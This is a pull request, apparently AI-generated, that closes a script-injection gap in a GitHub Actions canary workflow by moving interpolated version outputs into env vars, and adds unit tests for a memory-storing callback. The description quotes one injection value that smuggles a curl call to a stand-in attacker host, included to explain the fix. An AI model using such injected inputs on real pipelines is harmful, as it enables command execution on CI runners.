### PR TITLE
ci: close consumer-canary script-injection gap (follow-up to #438)

### DIFF
--- a/.github/workflows/consumer-canary.yml
+++ b/.github/workflows/consumer-canary.yml
@@ -63,6 +63,9 @@ jobs:
 
       - name: Create fresh consumer project
         shell: bash
+        env:
+          CORE_VERSION: ${{ steps.versions.outputs.core }}
+          AI_SDK_VERSION: ${{ steps.versions.outputs.ai_sdk }}
         run: |
           set -euo pipefail
           mkdir -p canary
@@ -70,8 +73,8 @@ jobs:
           npm init -y
           npm pkg set type=module
           npm install --save-exact \
-            "@memories.sh/core@${{ steps.versions.outputs.core }}" \
-            "@memories.sh/ai-sdk@${{ steps.versions.outputs.ai_sdk }}" \
+            "@memories.sh/core@${CORE_VERSION}" \
+            "@memories.sh/ai-sdk@${AI_SDK_VERSION}" \
             "ai@^5" \
             "typescript@^5" \
             "@types/node@^22"

--- a/packages/ai-sdk/src/__tests__/on-finish.test.ts
+++ b/packages/ai-sdk/src/__tests__/on-finish.test.ts
@@ -45,4 +45,65 @@ describe("createMemoriesOnFinish", () => {
       projectId: "github.com/acme/platform",
     })
   })
+
+  it("returns early when extractMemories yields no memories", async () => {
+    const client = {
+      memories: {
+        add: vi.fn(),
+      },
+    }
+
+    const onFinish = createMemoriesOnFinish({
+      client: client as unknown as any,
+      mode: "auto-extract",
+      projectId: "github.com/acme/platform",
+      extractMemories: () => [],
+    })
+
+    await onFinish({ output: "done" })
+
+    expect(client.memories.add).not.toHaveBeenCalled()
+  })
+
+  it("returns early when no extractMemories is provided", async () => {
+    const client = {
+      memories: {
+        add: vi.fn(),
+      },
+    }
+
+    const onFinish = createMemoriesOnFinish({
+      client: client as unknown as any,
+      mode: "auto-extract",
+      projectId: "github.com/acme/platform",
+    })
+
+    await onFinish({ output: "done" })
+
+    expect(client.memories.add).not.toHaveBeenCalled()
+  })
+
+  it("preserves a per-memory projectId over the options-level scope", async () => {
+    const client = {
+      memories: {
+        add: vi.fn().mockResolvedValue({ ok: true, message: "stored", raw: "stored" }),
+      },
+    }
+
+    const onFinish = createMemoriesOnFinish({
+      client: client as unknown as any,
+      mode: "auto-extract",
+      projectId: "github.com/acme/platform",
+      extractMemories: () => [
+        { content: "Tenant override note.", projectId: "github.com/acme/tenant-override" },
+      ],
+    })
+
+    await onFinish({ output: "done" })
+
+    expect(client.memories.add).toHaveBeenCalledWith({
+      content: "Tenant override note.",
+      projectId: "github.com/acme/tenant-override",
+    })
+  })
 })


### PR DESCRIPTION
## Summary
Addresses review feedback on #438. That PR moved `workflow_dispatch` inputs into `env:` vars in the **Resolve package versions** step, but the same user-controlled values flowed through `$GITHUB_OUTPUT` and were re-interpolated directly into the **Create fresh consumer project** `run:` block:

```yaml
npm install --save-exact \
  "@memories.sh/core@${{ steps.versions.outputs.core }}" \
  "@memories.sh/ai-sdk@${{ steps.versions.outputs.ai_sdk }}"
```

A `core_version` like `latest" && curl attacker.com #` would survive the upstream fix and inject in this step. Now passed via `env:` and referenced as `${CORE_VERSION}` / `${AI_SDK_VERSION}`, closing the vector for anyone with `workflow_dispatch` access.

## Also
Adds the on-finish test cases flagged in review:
- empty `extractMemories` result → no `add`
- no `extractMemories` provided → no `add`
- per-memory `projectId` takes precedence over the options-level scope

## Test plan
- `pnpm --filter @memories.sh/ai-sdk exec vitest run src/__tests__/on-finish.test.ts` → 5 passed ✅
- `tsc --noEmit` on `@memories.sh/ai-sdk` passes (pre-commit) ✅

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/webrenew/codesmith/memories/pr/439"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1782404806&installation_id=129242532&pr_number=439&repository=webrenew%2Fmemories&return_to=https%3A%2F%2Fgithub.com%2Fwebrenew%2Fmemories%2Fpull%2F439&signature=c4abc10f0461565e65fc97da819227f3f17f9ad56ffc180e2473c1943c369b97"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>@codesmith</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->